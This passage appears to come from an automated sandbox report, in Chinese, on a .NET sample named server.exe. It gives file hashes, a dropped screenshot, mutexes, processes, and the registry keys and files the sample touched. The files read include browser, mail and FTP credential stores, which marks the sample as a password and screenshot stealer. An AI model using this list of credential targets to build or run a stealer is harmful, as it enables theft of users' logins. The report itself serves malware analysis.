0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_ICON |
0x0005e4ac |
0x00000468 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.09 |
GLS_BINARY_LSB_FIRST |
RT_GROUP_ICON |
0x0005e914 |
0x00000148 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
3.37 |
MS Windows icon resource - 23 icons, 32x32, 16 colors |
RT_VERSION |
0x0005ea5c |
0x00000233 |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
5.31 |
ASCII text, with CRLF line terminators |
RT_MANIFEST |
0x0005ec90 |
0x000001ea |
LANG_NEUTRAL |
SUBLANG_NEUTRAL |
5.00 |
XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |
导入
库 mscoree.dll:
• 0x402000 - _CorExeMain
投放文件
screen.jpeg
文件名 |
screen.jpeg |
相关文件 |
- C:\Users\test\AppData\Roaming\ScreenShot\screen.jpeg
|
文件大小 |
36124 bytes |
文件类型 |
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 800x600, frames 3 |
MD5 |
e6b37f111dca68dba5f9e9040d501734 |
SHA1 |
0b80a3316d72fa418ced2b314b33d93f2b585583 |
SHA256 |
f0674bd5895d25386962ac7733404f4a6e1f31129bcf9ac6735cf425bc1a2b0a |
SHA512 |
5016589cd75cd1e9ad7e32a6889e138587307dba32d1d30038d2d278a7b363914cede852c9a21078722680bf332dab8b23e3b3269ab62fb58675ca9abea9ba38 |
Ssdeep |
768:z+zuvp7Mqt+D03q5KJKintjgtakHOQwdK:z+qvBMqt+D06GtjgtaRK |
VirusTotal |
搜索相关分析 |
行为分析
互斥量(Mutexes)
- Local\_!MSFTHISTORY!_
- Local\c:!users!test!appdata!local!microsoft!windows!temporary internet files!content.ie5!
- Local\c:!users!test!appdata!roaming!microsoft!windows!cookies!
- Local\c:!users!test!appdata!local!microsoft!windows!history!history.ie5!
执行的命令
无信息
创建的服务
无信息
启动的服务
无信息
进程
server.exe PID: 1760, 上一级进程 PID: 1872
server.exe PID: 1792, 上一级进程 PID: 1760
读取的文件
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
- C:\Users\test\AppData\Local\Temp\server.exe.config
- C:\Users\test\AppData\Local\Temp\server.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
- C:\Windows\System32\MSVCR120_CLR0400.dll
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
- C:\Windows\Globalization\Sorting\sortdefault.nls
- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
- \Device\KsecDD
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
- C:\Windows\assembly\pubpol49.dat
- C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\4fc035341c55c61ce51e53d179d1e19d\Microsoft.VisualBasic.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll
- C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\4fc035341c55c61ce51e53d179d1e19d\Microsoft.VisualBasic.ni.dll
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll
- C:\Windows\System32\wbem\wbemdisp.tlb
- C:\Windows\SysWOW64\zh-CN\KERNELBASE.dll.mui
- C:\Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\b92a961849186d9c6ff63eda4a434d79\CustomMarshalers.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\b92a961849186d9c6ff63eda4a434d79\CustomMarshalers.ni.dll
- C:\Windows\Microsoft.Net\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll
- C:\Windows\Microsoft.Net\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll.config
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\98d3949f9ba1a384939805aa5e47e933\System.Management.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\98d3949f9ba1a384939805aa5e47e933\System.Management.ni.dll
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\wminet_utils.dll
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux
- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll
- C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources\v4.0_4.0.0.0_zh-Hans_b77a5c561934e089\mscorlib.resources.dll
- C:\Windows\System32\tzres.dll
- C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.resources\v4.0_4.0.0.0_zh-Hans_b77a5c561934e089\System.resources.dll
- C:\Windows\System32\zh-CN\tzres.dll.mui
- C:\Users\test\AppData\Local\Google\Chrome\User Data\Default\Login Data
- C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
- C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic.resources\v4.0_10.0.0.0_zh-Hans_b03f5f7f11d50a3a\Microsoft.VisualBasic.resources.dll
- C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- C:\Users\test\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
- C:\Users\test\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
- C:\Users\test\AppData\Roaming\Flock\Browser\profiles.ini
- C:\Program Files (x86)\Mozilla Firefox\nss3.dll
- C:\Program Files (x86)\Mozilla Firefox\nssutil3.dll
- C:\Program Files (x86)\Mozilla Firefox\plc4.dll
- C:\Program Files (x86)\Mozilla Firefox\nspr4.dll
- C:\Windows\System32\wsock32.dll
- C:\Windows\System32\winmm.dll
- C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
- C:\Program Files (x86)\Mozilla Firefox\mozutils.dll
- C:\Program Files (x86)\Mozilla Firefox\plds4.dll
- C:\Program Files (x86)\Mozilla Firefox\softokn3.dll
- C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll
- C:\Program Files (x86)\Mozilla Firefox\nssdbm3.dll
- C:\Users\test\AppData\Roaming\Flock\Browser\secmod.db
- C:\Program Files (x86)\Mozilla Firefox\freebl3.dll
- C:\Users\test\AppData\Roaming\Flock\Browser\cert8.db
- C:\Users\test\AppData\Roaming\Flock\Browser\cert7.db
- C:\Users\test\AppData\Roaming\Flock\Browser\signons3.txt
- C:\Users\test\AppData\Roaming\Thunderbird\profiles.ini
- C:\Users\test\AppData\Roaming\Postbox\profiles.ini
- C:\Users\test\AppData\Roaming\FileZilla\recentservers.xml
- C:\Users\test\AppData\Roaming\CoreFTP\sites.idx
- C:\Windows\SysWOW64\wshom.ocx
- C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
- C:\Users\test\AppData\Roaming\ScreenShot\screen.jpeg
修改的文件
- C:\Users\test\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
- C:\Users\test\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
- C:\Users\test\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
- C:\Users\test\AppData\Roaming\ScreenShot\screen.jpeg
删除的文件
无信息
修改的注册表键
- HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\server_RASAPI32
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\server_RASAPI32\EnableFileTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\server_RASAPI32\EnableConsoleTracing
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\server_RASAPI32\FileTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\server_RASAPI32\ConsoleTracingMask
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\server_RASAPI32\MaxFileSize
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\server_RASAPI32\FileDirectory
删除的注册表键
无信息